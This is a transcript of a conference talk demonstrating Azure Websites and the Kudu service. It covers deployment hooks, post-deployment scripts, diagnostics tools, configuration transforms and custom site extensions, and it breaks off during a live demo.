agreements against GitHub and something else called signatory which is a pet project of mine. So I'm going to go ahead and I'm going to say I want to create a new compute website. I'll custom create and we'll just go through the wizard. Let's go ahead and call this NDC demo. I want to create a new SQL database and the code that I'm deploying already is looking for a connection string called data context. So I'm going to make that the default connection string. Context. Great. The source I want to, the code I want to use is already on my GitHub account so I'm going to check that box so that we can publish from source control. Great. Next. Sorry about the water guys. I'm going to need to moisten my throat. So for the database, I don't really like this random name it gives so let's go ahead and just call that DB. It's a little easier to find. We will create it on a new server. I'll create a login and a password. Great. Okay. Now I get to pick where I want to pull my code from. Let's say GitHub. Next. You see this pop up window that was as you're going out to my GitHub account authenticating me. I'm already logged into GitHub so I came back right away and now I get to pick a repository that I want to use. I'm going to use a repository that I have called stack, full stack web perf. This is the actual demo code for my talk tomorrow. It's the second talk of the day where I'm actually going to be taking a look at this specific website and how to improve its performance on the network, on the server, in JavaScript, in CSS. Top to bottom we're going to make this website scream. But we'll just use the demo app for what we're looking at in Azure today. So I go ahead and I press complete and just like that I'm getting a website created. You can see it here being created. Azure usually does these kinds of things pretty quickly within the matter of a couple of seconds. There we go. And so now I can come in and you can see if I go to deployments, a deployment is happening. And so what is going on in the background, you can see that it's fetching changes. It's going to GitHub and it's cloning, it's downloading all of the code that I have on GitHub so that I can get it up and running on the web server. While that's doing that, I'll go ahead and turn on a couple of configuration changes that I like to have. I like to have logging enabled. So I'm going to turn on application logging. This is the logging that comes from my app. This is my trace dot write lines that I put in my code. Let me go ahead and turn that on to verbose. I like to see all of that kind of stuff. I'm also going to turn on web server logging. This is the logging that IIS gives you, the W3C standard log file format. I'll go ahead and hit save. And let's see if we're done deploying yet. Okay, great. We are. I'll browse to it. So a database was created, a website was created. The connection string was automatically put into the config file for me. At this point now, that website is being jitted for the first time. I'm using entity framework migrations in this website. So all of the data is getting populated into the database for this first request. And when all is done, we should see it. Now I'm American, which means a couple of things. I'm fat. A little bit. Self-difficating humor, a little bit. Okay. I love baseball. I'm in New York, but I'm not a Yankees fan. I'm a Miami Marlins fan. So what I decided to do was make and demo application all about baseball. But nobody in Scandinavia cares about baseball. So instead, I've made a website about clowns, essentially. But they're baseball clowns. These are the mascots of minor league baseball. There's 160 minor league baseball teams. And this website shows up their mascot. So if I wanted to, I could go look at the Texas minor league. And I can see all of the mascots that are available there. I can look at the winners of the mascot mania contest that happens every year. This is all the mascots compete and do stupid things, like throw pies in each other's faces. And you can see the winners here. There's some really great ones. Like this guy here, ballapeno. He mixes together jalapenos and baseball. So how can you go wrong with ballapeno? And there's other guys. Like Roscoe the P. Ray Rooster. This is not a guy that I would want to see in a dark alley. I have no clue what wrestling and baseball have to do with each other. But we're American. Why not some gratuitous violence? So this is my website. And so just like that, in a span of a couple of minutes, I have this database of this website up and running. So that's great. If you haven't seen it, that's Azure websites. So let's go ahead and dig into what Azure websites really is. Now, if you've been around the block with Azure a little bit or you've sat in a talk show and you may have heard of something called a web role, websites is not that. Web role, website, two completely different things, unfortunately, that they're named so similarly. Web roles are still around. And I've put a comparison of some of the things that you can do in web roles that you can't do in websites and vice versa. To me, I kind of feel like a web role is really more appropriate when you have something really custom, really enterprise, maybe a legacy code base that you're trying to move into the cloud. That's because of you get elevated startup scripts so you can install things on the machine that is running that website. You can have dedicated IP, virtual networks, things like this. The biggest flaw with web roles to me is deployment can take eight to 15 minutes. That's just too long for me as a developer. And I have to do a little bit more management of the box and I'm the dev half of DevOps, so I'm kind of uncomfortable with that. Websites, on the other hand, really suits me well. Everything runs through my source control and that's a dev friendly thing. And so they're kind of like tacked on ops in the way that a dev wants to do it. That means we're kind of using continuous deployment, basically. Deployment is very fast. Like, yes, that probably took about 30 seconds, but from a hold start, that's not too bad. And the example I just gave, we have some other options that aren't available with web roles like content backup, rollbacks, web jobs. Some of these things are all interesting. But if we stop and think about what really is an Azure website, it's not that different from what the ops guy that I let hang out in the back closet do. It's just like the hardware that you have had in the past. It's a copy of Windows running somewhere with.NET and IIS on it. That's kind of good news because the ops guy can still be quite comfortable. But there's this extra layer on top that is completely open sourced and available on GitHub called Kudu. And so I have the Scott Gu OctoCat here representing Kudu. Now, just to prove that Azure website is nothing special, what I'm going to do is I'm going to use the ops manager's friend here. This is IIS manager. And I'm going to make a change to the website that we just deployed in the cloud. So if I connect to a site, I'm going to type in NDC demo and I'm going to go to port 443 and I'll give it a name of NDC demo. That's arbitrary. My username, my password. Authentication happens. Great. I can name the connection. Finish. Cool. So now what I'm looking at is the standard IIS interface that I would use in my enterprise, but connected to the Azure cloud on that website I just created. So let me prove it to you. There's a whole bunch of things that we can see. Like I can look at application settings and you can see some of the standard NDC settings that are added to your web config. So web pages version, unobtrusive JavaScript enabled, et cetera, et cetera. I'm going to go into this HTTP redirect. I'm going to turn on redirects to my site and we'll just point to something ubiquitous like Google.com. Let me apply that change and now when I come back and I refresh, you'll see that my website redirected me to Google. And let me go ahead and turn that back off because nobody wants to look at Google the rest of the time. Apply that and now if I go back, I can refresh and my site will need to rejit and everything because I restarted the web server, but the site will come back up here in a second. So I show all of that to you just to say what really is websites. Well, it's standard IIS. It's standard.net. It's standard Windows. But this Kudu layer, that's the part I haven't touched. Let's really dig into what that is. You'll notice that I have a diagram here showing Kudu going off to all of these different source control providers. I have Bitbucket on the top and then GitHub and then Dropbox, which I don't understand why we use the word Dropbox when we talk about source control providers, but I've been guilty of using Dropbox as source control, so maybe it makes a little sense. And then Codeplex because everybody uses Codeplex. So Kudu is named after this animal. It's a real animal. It kind of looks like a goat that I wouldn't want to mess with, but he's there. It's interesting. It's a service that is different than most services we interact with today. Today, typically when I think of service, my connotation is a multi-factor service. There is one service that I interact with that might manipulate many different things, but everybody is connecting to the same service. So it's a multi-tenant service. Kudu is a single-tenant service, which means that for every website you create, an instance of the Kudu service is also created to go along with it. It's like a buddy site. These two things go together. And Kudu and that website are linked in a couple of interesting ways. As of right now, this might not always be true, but as of right now, Kudu runs in the exact same process as the website. It runs in the same sandbox as the website, and that means a few different things for you as a user. One, it means that Kudu has access to do anything that your website has access to do. Two, it means that the only thing that Kudu can screw up on that box that you're in is your website. So you can do things in Kudu that break your website. Three, it means that all of your quotas between your website and Kudu are shared. So CPU usage, memory usage, hard drive usage, all of that stuff that you're doing with Kudu is also going along with your website. So you kind of pay for it. So let's take a timeline look at what Kudu does. I basically like to think of Kudu as a very low-level continuous integration server. And I say that because it reminds me of seven, eight, nine, ten years ago when I was working on cruisecontrol.net, if you guys ever played around with that. Basically, cruisecontrol.net would watch some source control provider when the source code changed because you committed or pushed or whatever it was called and whatever flavor of source control you did back then. Whenever that happened, it would pull down those changes and then run some script. So the first thing that we see that Kudu does is it connects to the source control provider and it acquires your source when you change it. The next thing it does is it builds the code that it's received. Now Kudu works with lots of different flavors. I'm a.net guy, so I'll mostly be talking about.net, but it also works with Node and PHP and Java and Python. So if your environment, if your programming environment in Dejure doesn't require build like Node or PHP, it just doesn't build. But for.net, there is a build step, so there is a build. And then the next thing it does is it copies the assets into the WW root, the place that I serve content out on the open internet, whether that's the binaries that have been compiled or it's just the source that run in interpreted languages. And then finally, it does some post-actions. It says, hey, I'm done doing the main thing that I do and there's two flavors of that. There's post-actions, which you see first. These are scripts that you can execute. And the second thing that it does is it uses, I'll use the word technology loosely, it uses webhooks, which are basically the opposite of web APIs. So let me show you what that looks like. First, let's talk about these post-actions. Just a general note, everything that I do today is going to be stuff that you can't do through the portal or mostly can't do through the tools that Microsoft gives you. That's why these are the secrets. So the things that I'm telling you today are available and they're supported, but sometimes they're a little rough around the edges and a lot of it has been me kind of dancing through trying to figure things out or talking to people that work on the Azure team to get this kind of information. You may see in the future that some of these secrets will show up in the portal and it won't be much of a secret anymore because there will be a button that you click and it does the thing that I'm showing you how to do now. But maybe not. So this post thing is an example of that. So let's go ahead and just copy this little thing and cheat a second here. What I'm going to do is I'm going to go back into the portal and on the dashboard I get a URL to an FTPS, a secure FTP location. And a lot of people don't realize this, but Windows Explorer is an FTP client. So I just opened up Windows Explorer. I pasted that FTP address. I hit go. It's going to authenticate me. So once again I'll type in my password and my username was already there. And we are connecting to the site. Cool. I am now just FTPed into that box that I earlier connected to with Internet Information Services Manager, IIS Manager. So I'm connected that same thing via FTP. If I go into the site, I can see all of my content here in the WW root. I can start deleting things and changing things and you're going to see that live on the website. There's a bunch of other files and folders in here though that are not my website like this diagnostics, repository. This is actually where all my Git code lives and you can see my Git attributes and whatnot. But what I'm going to do is I'm going to go into deployments. Kudu stores all of the information about your deployments on disk. So that's kind of cool. But inside of tools I'm going to create a new directory. So new folder and we're going to call it post deployment actions. Cool. And inside of there I can add any number of scripts that I want to. So batch files or cmd files. So let me go ahead and just create a really simple one so you guys get the point. I'm going to say echo hello from post.bat. Let me save this as post.bat. Not nat, bat. Okay, great. And then let me grab that file. What did I stick to? I stuck it on my desktop. Users, Nick desktop. Post.bat. I'm going to copy this file and just, oh, let me copy it. Sorry guys. Copy the file and I'm going to drag it into this FTP window here. Cool. So I just uploaded a file through Windows Explorer over FTP to my website. Now, any time a deployment happens and instead of re-downloading all the code I'll just redeploy what we already have deployed. That script will execute. So I'm going to click on this deployment. I'll say redeploy. Yes, this should happen much faster this time because there's no source code to download. There's been no changes on the repo. So you can see it's deploying. Cool. We're done. If I come through here and look at the logs you will see that I have executed that file and it's saying hello from post.bat. So obviously I just echoed. That's not really anything interesting. But in this scenario any post steps you would make after deploying something you could do. So priming caches, building contents, a CDN provider, anything like that you can all do in these scripts. You can have multiple ones. So you can have one for each different task you're doing. And Kudu will run them in order, the same order that you see them in Windows Explorer. And if one of them errors returns an exit code of zero it will just stop there and the rest of them don't run. But that's kind of cool, nice little hidden trick that you can do to do things after the build has happened. So that's this post action, the one on the top. But there's also this web hook option which is really handy for guys like me who are web developers. I'm not super comfortable getting down into like scripting batch files or whatnot. But web programming I'm all about. So let's take a look at how the web hooks work. What I'm going to do is I'm going to go to this website called Zapier. Zapier is similar to if this then that, if.com if you're familiar with that website. I like to think of it as programming my mother could do. It's very simple like draggy, dropy, point and click kind of thing. So I'm going to make a zap. And the reason why I'm using Zapier is because the Azure website's team has worked with Zapier to have a nice experience specifically for websites. So when I create a new zap which is basically an if then block of code, I can choose what my if is going to be my trigger. And I'll do a search for Azure. And you can see I have Azure websites. So when this happens, either when a web job is run or a site is deployed, that's the one I care about. So when a site is deployed, then what do I want to do? Now I use this all the time for my side project, which I call Glutly. And what I have Glutly do is send me a text message on my phone every time a deployment happens. So that looks something like this. This is literally a screenshot from my phone. You can see there that my last deployment was successful. I have a URL so I can click and go right to that spot. And you can see I fixed the bug resulting from multiple restaurants being added to a database. I'm American and I don't have a SIM card that works here. So we're going to do something a little bit different, but it proves the point of how easy it is to plug and play with something like Zapier. So instead we're going to go to Twitter, because I do have an internet connection here. And we're going to send out a tweet anytime a deployment happens. So that's what I'm going to do. So when there's a new website deployment, I'm going to create a tweet. Like I said, my mom can do this. Now we need to tell Zapier about my website. And so if I say connect to an Azure website account, you'll notice here that it's asking me for a deployment trigger URL. Well, what's that you ask if you go into the portal and you go over here to configure, there is a field that has just that URL. So I'm going to copy it. I'm going to come back to Zapier and I'm going to paste it. And then we'll give a name to this connection. So this is going to be Azure websites. This is for the NDC demo. Great. Continue. And so you can see here the account is working. Zapier and my website are now communicating. And that communication is happening because the Kudu web service is there. I never see it, but that's what's going on there. I can press continue. I'll make this go to my Twitter account, NickMD23. Continue. I can add filtering so I don't always do this. We'll just skip that step because I want to prove the point to you guys. Continue. And so we'll say deployment happened. And I can put in variables. So if I say insert fields, Zapier now goes out to that web service that Kudu is hosting and it will show me all of the fields that I have available in a moment. Hang tight. Can take a minute, apparently. There we go. So you can see I can use the message, the status, the author, the deployer, all of these different things. We'll just go ahead and put the message into the tweet. Continue. And click the button to test. That's fine. And we're good to go. Oh, I need to name this Zap. So we'll also name this NDC demo. Cool. Turn Zap on. And now, anytime I do a deployment, the website will tell Zapier. Zapier will see that anytime a deployment happens, I should be doing a tweet. And you can see that this thing is on Azure websites to Zapier. So what I'll do here is I'll come back to my website. I'll look at my deployments. We will redeploy, just like as we did before. And while that happens, we'll go over to my Twitter stream to see the tweet come through because the tweet will come from me. I'm a big foodie, as I already mentioned. So you might notice that last night I went out to dinner here in Oslo and we decided to have whale meat. This is not something I'm accustomed to in the States. It made me kind of think that I bet Twitter never fails in Oslo because everybody knows the famous fail whale. You guys would eat it. So Twitter just, it's like we're not going to fail in Oslo. We'll kill our beloved mascot. So that deployment should have finished. It has. Let me go ahead and refresh my Twitter stream. All right. We're still waiting for Zapier to send the tweet through. There we go. Deployment happened adding, tracing for Azure demo. So just like that, a tweet has happened. Maybe it's told all of them, everybody who cares about the website that there's a new version. I'm going to go ahead and delete that tweet so my followers don't get irritated with me. So that is using the web hooks that Kudu allows you to use. Now, all of these steps in the pipeline are extremely configurable and this is something I find that nobody really knows about. So let me show you the configuration points. All of them. So the first thing is you can change the way that Kudu interacts with your source control provider using app settings. I've shown you some of the app settings here. There are more available in the documentation which links are provided for at the end of the talk. So in the app settings, which I will show you really quickly in the portal. If I go to configure, here are my app settings. These are just key value pairs. If I use the right named key as shown on this PowerPoint, these app settings, I can change things like the path in which Kudu will clone all my code or it will say not to use a repository which is what happens automatically with Dropbox or the target path. So you can do really interesting things like do in place deployments. So you can have the code copy right from the repository into the wwroot. So if you just want to deploy your assets already built, maybe you handle the building, you can just flip a couple of switches here and it will grab it and just stick it right in wwroot and you're serving it. The next thing up that we have here is this Iini file which is a little archaic but I guess I would prefer that over XML. There's all these other settings that we can use. So one of them is you'll see this SCM post deployment actions path. So I just had the FTP into the site and go into this tools and deployment directory to put that post.bat file there. Well that's kind of a pain in the butt. What if I just wanted that to be in my source control? That's fine. I could have put that script right in the source control as long as I go and I change the setting and I tell Kudu when you're done, don't run the things for the scripts from where you normally get them, run them from this path that I've given you. So you can override basically everything. And then finally kind of the Mac Daddy, blow everything up and change it, this dot command file. Essentially everything that Kudu is doing, you can stop and say, hey Kudu, will you write down your logic for me into a file so I can change it? And so you can do that. Let me show you what that looks like. I am here at the command line. I've already installed the X platform Azure CLI tools and I'm looking at full stack web perf. That is my repository, my directory where I have all of this code for this mascot website. So I'm going to say Azure site deployment script and that takes in some parameters. This is going to fail. Basically that's the command that I tell Azure to say, hey, persist all of your logic. So what I need to do is I need to tell it first of all that it is an ASP web application. I need to point to my project file so that's in the directory structure. Actually let me show you the directory structure. So you can see that I have a folder called demo. I have my PowerPoint slides for that talk. I have a demo script, etc., etc. So I'm going to say that it's an ASP web application that lives in demo slash minor league baseball web. Minor league baseball web, that's my CS project file. The other thing that I need to do is I have to say that there is a solution file at demo slash demo dot solution. If I run this, it already exists, that's okay, I'm going to overwrite it for this. It is just gone and written in two files to that directory. So let me go back to DER and you can see that there is this dot deployment file here and this deploy dot cmd file here. So let me go ahead and open up in notepad that dot deployment file. This is the INI file I mentioned before that we were talking about. You can see here that I'm telling Kudu the command that you run after you've downloaded all of my source code is deploy dot cmd. That's the new file that just got created. So you can create your own, you can override, you can do whatever the heck you want to, you're just overwriting what Kudu does right from this spot. If I open up that deploy cmd file, oh, nope, I have to spell it right. You can see here this is everything that Kudu does. It looks big, especially when I scroll really fast like that. It's not too bad, it's very well commented. You can see here that essentially it goes through and sets up a bunch of environment variables. These are the variables that you can override from app settings. You can go in and change any one of these. So if you want to change the deployment target, you can go into the portal, add that as an app setting and that will override this deployment target because you can see it's checking to see if it's already defined first. So you can define it there. It comes through and here's where it does the meter that work. The first thing it does is restore new get packages, then it builds into the temporary path and then it does the sync. This is where it takes all the built files and moves it over into your wwroot. So that's cool. If you want to change anything about how this works, you can go in there and do it. If you don't want to go hog wild, here's where it's actually calling MSBuild to do the build. You'll notice at the very end of both of these lines, it's passing in this build args. Once again, this is another setting that you could put in your inifile or in your app settings to say these are additional build arguments that I want passed into MSBuild when I build my site. So you don't even have to go this far. I've gone this far in a couple of my sites, that one that I showed you where I was texting myself. Let's go ahead and look at that deploy file. I don't want to run it. I want to edit it. So you can see that in this file, the standard thing, restoring the new get packages, building, blah, blah, blah, I've gone in and I've added unit tests. So my unit tests basically, oh, here we go. This is the unit test. Sorry. Really just change the directories into where my X unit runners are. That's just a package. So if I look at my packages, you can see all of the different packages and there's the X unit runner is in there somewhere. I use this little handy trick of using a star here, which you can use with change directory because I never know what version of the runner is going because that all gets handled through new get. So I change into whatever the version I happen to have is and I run it. And if there's an error, then I error out and I continue and that deployment won't happen. And then I get text and I'm told that there was an error on the deployment. So that's great. So basically I have a CI server, a continuous delivery server, all in one with four lines of code that I downloaded from the end unit website. So that's great. I can create that command file and basically do whatever I want. Now Kudu does a couple of other things besides just this deployment and building that we've talked about so far. Oh, don't go. We're going to miss you. Have a good day. It does a bunch of debugging and diagnostics and makes that information available for you in ways that would kind of be difficult to do on your own because you're in the cloud. And that's what the special star.scm website. So what I'm going to do is I'm going to come back over here to my browser. I'm going to copy the website that we've been using all along. So this is the NDC demo Azure website. I'm going to paste it and all I'm going to do is I'm going to add in.scm into the URL. So every Azure website that you have right now already has this thing enabled. You just don't know about it. And that pulls up this Kudu page which has all kinds of really useful, interesting things. So the first thing that you'll see is environment, which shows you a bunch of information about the system that I'm running on. I am running on a 64-bit system, but I'm not in a 64-bit process. I have one processor, blah, blah, blah, blah. I can see all of the app settings, the connection strings, the environment variables, all kinds of good, useful stuff for when you get into a jam sometimes. There's also this Process Explorer that I can click on. This is actually an HTML version of Process Explorer. If I hit Control-Shift-Escape, this is my normal task manager that I get for my local machine. I'm looking at the exact same thing now. I'm looking at the same thing now for my remote machine, just an HTML version of it. I can dig in. You can see my W3WP, that's IIS is running. I can dig in and look at the properties there. I can see all of the threads. I can look at the properties of a thread, et cetera, et cetera. I really like this handles. So if you ever get a locked file, you can see which process is holding on to that file. You can go in and you can actually kill the process from this UI. So that's kind of cool. There's some other tools too, like you can download a diagnostics dump. If I click on that, it's going to give me a zip file that I can run through with some debugging tools. There is this Log Stream. Now, this is streaming logging. This is showing me all the logging information that's happening on my website. So if I come back to my website, let's go to a split screen here. As I click around, I go into the Appalachian League and you can see that that log happened. I go back to the home page and you'll see there's the home page. I can go see all the winners. I'll see the winners. So I could be watching this log as hundreds and thousands of people hit this website if it was well known and I could see what's happening live on the website. So that's kind of a cool tool. There's a few other things that are interesting. Oh, web hooks. This is funny. So if you didn't want to use Zapier, this is where you could come and configure your own web hook. You'll see that Zapier has already reached back into Kudu and set itself up as a web hook. But I can type in any URL that I want to right here and any time a deployment happens, Kudu will post deployment information to that URL so that could be a local service that you're running in your enterprise to update some dashboard that sits in front of your manager to let him know that a deployment happened. So that's all good stuff. The last thing that I'll show you, I'll show you two more things in this Kudu. All of Kudu exposes a RESTful JSON-based API so that you can get at this information programmatically. So if I wanted to see the app settings for this website, here they all are and, Jason, you can see that I'm just going to API slash settings. If I wanted to see all the deployments that have happened in this website, I can open that up and here's the deployment. I like this files one. This basically gives me the file system that I was looking at at FTP in a JavaScript way and I can just drill through and say, okay, I want to dig into site and I can follow this link that gives me for site. I want to dig into WW root. I can follow this link to get into WW root and boom, there's my packages config, my scripts, my snippets, my views, all that kind of stuff and I can build a whole file browser just using these APIs. And then lastly, Kudu has this debug console. It has a PowerShell version and a command EXE. I told you guys I'm not much of an ops guy so I shy away from PowerShell. I'm trying to tell me this for developers. I'm not buying it. So I'll just use the good old command.exe. If I come into that, I am actually now looking at a terminal on the machine that my website is running on. And so if I go CD into site, not only did I change directories but you'll notice that the top part, this HTML table has changed and it follows along with what I'm doing in the command line or similarly if I click on WW root, you'll notice that the command down here changes WW root. So I can go in there, I can check things out, I can look at the file system, I can do whatever I want to without having to go into FTP. So this is all quite handy and something that Kudu gives us which is nice. Now, everything that I just showed you there might be a little bit scary because I'm giving you a lot of access just by knowing the SCM part of the URL. That's where I want to stop and take a step back. Kudu is interesting. It runs on the same process and the same sandbox and all that stuff but unlike your actual website which is not authenticated by default, everything inside of Kudu is. I was just already authenticated so you guys didn't see the challenge. Now, there's multiple types of credentials that you use in Azure and this is kind of confusing but as far as Kudu is concerned there's two and they're called deployment credentials. So typically when you log into the portal or something you'll use your Microsoft account, right? Kudu doesn't care about your Microsoft account, it doesn't know what that does or follow it. Instead, it uses either user credentials which you know user credentials from the portal because on the dashboard you'll see this thing that says reset your deployment credentials. That is a user credential. You have one. You have one of those for every single one of your Microsoft accounts which means if I change the password there, it's not just changing it for my minor league baseball website, it's also changing it for GitGlimpse website and it's also changing it for that signatory website because that set of credentials is stuck to me. Never give out that set of credentials. They're yours. If you lose control, you go in there and you reset it and it'll reset everywhere. The next one is site credentials. These are ones that are made for you to give out. They're generated for you but they're specific to a website. So I have four sets of site credentials, one for the minor league baseball website, one for signatory, one for GitGlimpse, etc. They're auto generated so you can tell a site credential because it begins with a dollar sign and the username is always dollar sign and then the name of the site that you're using and then the password is some long messed up GUID. You can actually see this because if I went back, you guys remember earlier we had a copy and paste something into Zapier which is that trigger URL. Look at this. You can see the name of my site is NDC demo and you can see dollar sign NDC demo here. That's that automated username and you can see here's my password and Kudu is just using HTTP basic auth when the client makes a request to that. It rips those things out of the URL, sticks it into an auth header and that gets sent off that standard HTTP authentication stuff. But there you can see that. If you download your published profile which is available from the dashboard, reset your published profile credentials, I could download it as well right here, download your published profile. That's just an XML file and if you dug into that XML file you'll find that exact same username and password. And most of the tooling that you'll use that wants to connect to Azure for you will say give me your published profile. So you're giving it a set of site specific credentials and if you lose control you can reset those as well but those are site by site. So everything in Kudu, you're good, it's authenticated using one of those ways. Great. So we've looked at a whole bunch of different things that we can do with Kudu and the process but I want to stop and also think about what are the ways that we can kind of configure Kudu to do additional things. And it's not even just Kudu but IIS and.NET and what is afforded to us. So this diagram I made, parts of it should be pretty recognizable to you. So everything in all the blue circles, that is the standard.NET configuration scheme that we've known since day one, right? There's a machine.config, there's a root web config, those things get merged in and then you can have web configs and directories going down farther and farther, deeper and deeper and they all get merged together into your application. And that makes web config and if you're running an IIS 6 or before, that is the whole story, just the blue, the dark blue, those three. And IIS 7, they added a new configuration file called application host.config. These are IIS specific settings and that file gets merged in along with the web root. So now you have IIS and.NET code intermingling. In Azure there's yet one more layer which is this Azure overrides and these are all of the configuration settings that you've put into the portal. So all of these things come together to give you final configuration, stuff that you've typed into the portal into your web config from the app host. Microsoft gives you an app host. Now you'll notice that these two of these have a little bubble that says xdt. That's the web config transform schema that's available. You probably recognize this from Visual Studio when you create a new project underneath web config, you have web.debug.config and web.release.config and you know you can make changes there so the release mode and the debug mode look different. That's called xdt. That exact same file format schema is available in Kudu to run on your app host so you can change IIS settings. So let me show you what that looks like. I'm going to go into Kudu again. I'm going to go to this, oh I'm already in the debug console. Great. I'm going to upload a file. So I have this outer curve SVG. This is an image, a scalable vector graphic image so I can zoom in forever and it will always look good. Outer curve is the foundation, the open source foundation that Kudu is a part of. I'm going to upload that to the site. I can do that very simply because I'm looking at my ww root right now. If I drag this up to the web browser, like I said it's kind of an FTP client, I can just drop it and that's going to get uploaded and now I have outer curve SVG. So if I go back to my site, now I can say slash outer curve SVG. But I get an error. Well, that's because by default IIS doesn't know what to do with SVG files. It's easy enough to change. You just go in and you add the file extension and the mime type and you're good to go. But we want to do this in a Kudu way, a way that's reusable. So Kudu allows us to, I'm going to go up one directory so I'm looking at site. It allows us to put one of these transform files in. So I have this application host transform file right here. I'm going to upload that to the site. And now that that's there, I need to restart the site. So let me go to the portal. I'm going to stop the site. I'm going to start the site. Okay, great. The site is starting up now. So because Kudu solved that file with that name and that location, when the site restarted, it said, hey, this user wants to change application host.config. I'm going to apply that transformation. And I'm going to show you that transformation in a second. But now if I go back to this page and I refresh, you can see I'm getting my outer curve SVG file served to me because I added that other file in that one spot. So what does that file look like? It's quite simple. This is the entirety of the file. So I'm using the XDT transform. So I'm inserting an element. I'm adding any file that ends in.svg to serve it as a mime type of image SVG plus XML. I'm also going a step further because I care about performance, which you'll hear more about tomorrow. I'm saying that image SVG is I want to do HTTP compression. So that's that whole file and boom, now my whole website can serve SVG files. This is a pretty simple example. And actually, this example I could have just baked right into my web config and checked it in. No big deal. But Kudu goes a step farther. So here's another example that you might want to use. This is increasing the length of the queue that IIS holds. IIS has a queue. It's a number of requests that it will hold on to. And once you go past that queue, it will start issuing 503 responses. It will say service unavailable. I think that that number by default is a thousand. In this example, we are once again doing a change. We're changing an attribute. That's what the set attribute does. I'm changing it to 5,000. So more people will wait longer before they get service unavailable on my site. But notice there's this XDT site name that's surrounded in parentheses. There's a token there. What's cool about these apphost.xdt files that I can upload to Kudu is it will scan them for certain tokens and replace them with runtime variables, which means that this file I can now upload to any website that I want to because the name of the site, which normally would have been hard coded, is now variable. And you can see there's a couple of different things. There's a site name, there's the app pool name, there's an extension path, etc., etc. That one difference, that one thing that Kudu does opens up a really interesting universe to us. So let me show you another file. This file is going to add something that Kudu calls a site extension. What a site extension is is really just us leveraging the power of virtual directories, which I've never really used before. But now I can take this file. You guys can literally copy and paste this from my slides, change these two variables where it says extension name, and we can start to put things into Kudu ourselves that are authenticated. So we can give our administrators a place to add them in the website completely. Stuff that is is specific that I've already showed you in the Kudu website, and stuff that is important for our app. So let me show you some examples of this. Actually, you know what, no, let me make sure that this is really hitting home. So this is Azure website in a architecture diagram. There's the user site that sits on top. There's a buddy site right next to it, right? That's kind of what our site extensions. The site I've already been showing you is actually a Kudu site extension. It's just this virtual directory kind of thing. And Microsoft installs some of them for you by default. So Kudu, we've already looked at. Visual Studio Online, you might have seen. Web Deployer, Web Jobs, you might have seen. Microsoft puts those there. And if you want to partner with Microsoft and call them and have one built in, they allow for that. But we're not going to do that. We're just regular users and we're not trying to change the way Azure works in general. Instead, we can either install an existing one or we can upload our own. So let me go back to Kudu. And I'm going to come over here to site extensions. And you can see that from my site, I'm on the installed tab and I don't have any extensions available. So I can go to the gallery. Now, this morning when I did my run through, there was an additional option here that put in an IIS log analyzer that would tell me where my traffic comes from and how many hits I have and all these kinds of things. It's gone. Which stinks for you guys because it's kind of cool looking. But it's actually a teachable moment because you can kind of see already where Microsoft is going with this. The reason why it's gone and I had to dig through the Kudu source code to figure this out is because all of these things are just Nuget packages. And it's fed by some private Nuget feed somewhere that Microsoft controls. And that was the one I want to show you was a package on there. And they've removed that package from the feed. That's fine. I'll install another one. It's less impressive, but it'll still give you the point. I'm going to install this file counter. The source for this one is available on the Internet. It's the only one that I know that source is available for. I'm going to press install. And you see I get this little thing that says restart the site. There's actually a bug with restarting the site. Both in the portal and on the site extensions. So I'm just going to stop and start. That's kind of the way to make sure that it really restarts. And so now that I've done that, I have this little play button available on file counter. And file counter is amazing. You ready? I press play. Oh, hold on. It's still starting up. Told you it's amazing. Okay. There we go. The world's most amazing file counter. Your site has 539 files. All this is is a tiny little website that knows where it's sitting and it counts all the files that sit inside of my www route. Spits that back. Not very useful, but you can make it do anything that you want to. Let me show you one that's a little bit more useful for our application. And obviously I can come in here and I can uninstall this thing. And you can imagine a world where there's all these admin tools. I'm not a PHP guy, but PHP MyAdmin is very full featured. And if this is a PHP website, that would be kind of cool to show you. So what I've done is on our minor league baseball website here, every year the winner of mascot mania changes. So this year it's this guy here, Lucille from the Columbus Clippers. And you can see that he's kind of the hero of the website. He's the big picture that you see. And the administrators of this website are constantly saying, hey, there was a new mascot. Can we change it? And I have to go in there and I have to change the code. So what I want to do is I want to give them an administrative tool. But there's no authentication on this website. I don't want to build out authentication. I just want them to be able to use the credentials they already have with Azure to log in. So what I've done is I've created this simple little file, default ASPX. And this is like, I've made it really simple and ugly on purpose because I don't want you guys to focus on the code. But essentially what it does is there's an if statement. If it's a get request, I build up an HTML form that has a select or I'm looping through and writing a bunch of options. And if it's a post, I do some updates to the database. What's important to note is because I'm running in context of the website, I can still get the configuration manager to give me the data context. I have access to all the variables that the website is already using, so I don't have to ask for any input. So to install this, I have created this application host XDT. This is the exact same thing that I'm showing you here, except for the word extension name has been replaced by hero. And so I'm going to take these two files, and I'm going to upload them. So I'm going to come back to the Azure portal. I'm going to go to the debug console because that's the easiest way to upload things. And you'll notice that there's a new directory now that I installed the site extension right next to site called site extensions. So that's fine. Once again, this just follows the convention. I'm going to add a new folder called hero. I'm going to go inside of hero. I'm going to upload these two files, drop them. Boom, they're there. Once again, I made a change here. I need to restart the web app. So let me stop it and start it. Okay. So if I go back and look at my mascots, I'm refreshing. It's going to take a little bit because of the jit, but we'll still see Lucille as the main winner of the mascot. Contest. Wow. Come on. Come back up, Azure. They promised me that this restart thing has been fixed in the new portal, but we'll see. Yes, because deployments, the question is could you use deployment stops? And the answer is yes, because the deployment slots are still spinning up and the process is new, and so kudu when it spins up, we'll do all the configuration stuff. Yeah. So since I named this hero, I should be able to go to hero. Okay. Now my website is really dead. Let's see what's going on together. Wow. Really dead. I'm not even getting console. Well, this is fun. I am stopping and starting to write website. Okay. Well, let's do this. I could check the logs, but I'm not going to go splunking through all that stuff with you guys here. So let me try one thing. Let me. Okay. This is good. The fact that I got this far is great. This is a good sign that this is working now. That's not a good sign. I'm wondering if I screwed up something in my file. Come on, guys. This is the big demo. This is the one you're on. You're like the edge of your seat, right? I've never screwed this up before. Oh, man, Azure is really killing me here. Okay. You know what? I have another option. We're going to use all the tools that we've learned about in this talk right here right now. Just pretend that I meant for this to happen and it would be awesome. I'm going to use FTP and see if I can even FTP in. So like I told you earlier, this stuff is rough around the edges right now. I can go into the site. Nope. Oh, interesting. The site is back. Hey, thank you. You can hit it, but I can't. You might be coming up here to finish this demo, buddy. Well, okay. So the point here is what's supposed to happen is can you, oh, you can't hit this URL because you can't authenticate this. Let me try another browser. Good call, Anthony Van Der. Hey, hey, hey, hey. That's what you wanted. Okay. Is this one? Everybody hold your breath. So what we have here now is in Hero. This is the admin thing. This is that super simple page I showed you. I have a drop down of all of the different mascots and I can pick who was the winner. So who am I going to pick, guys? Come 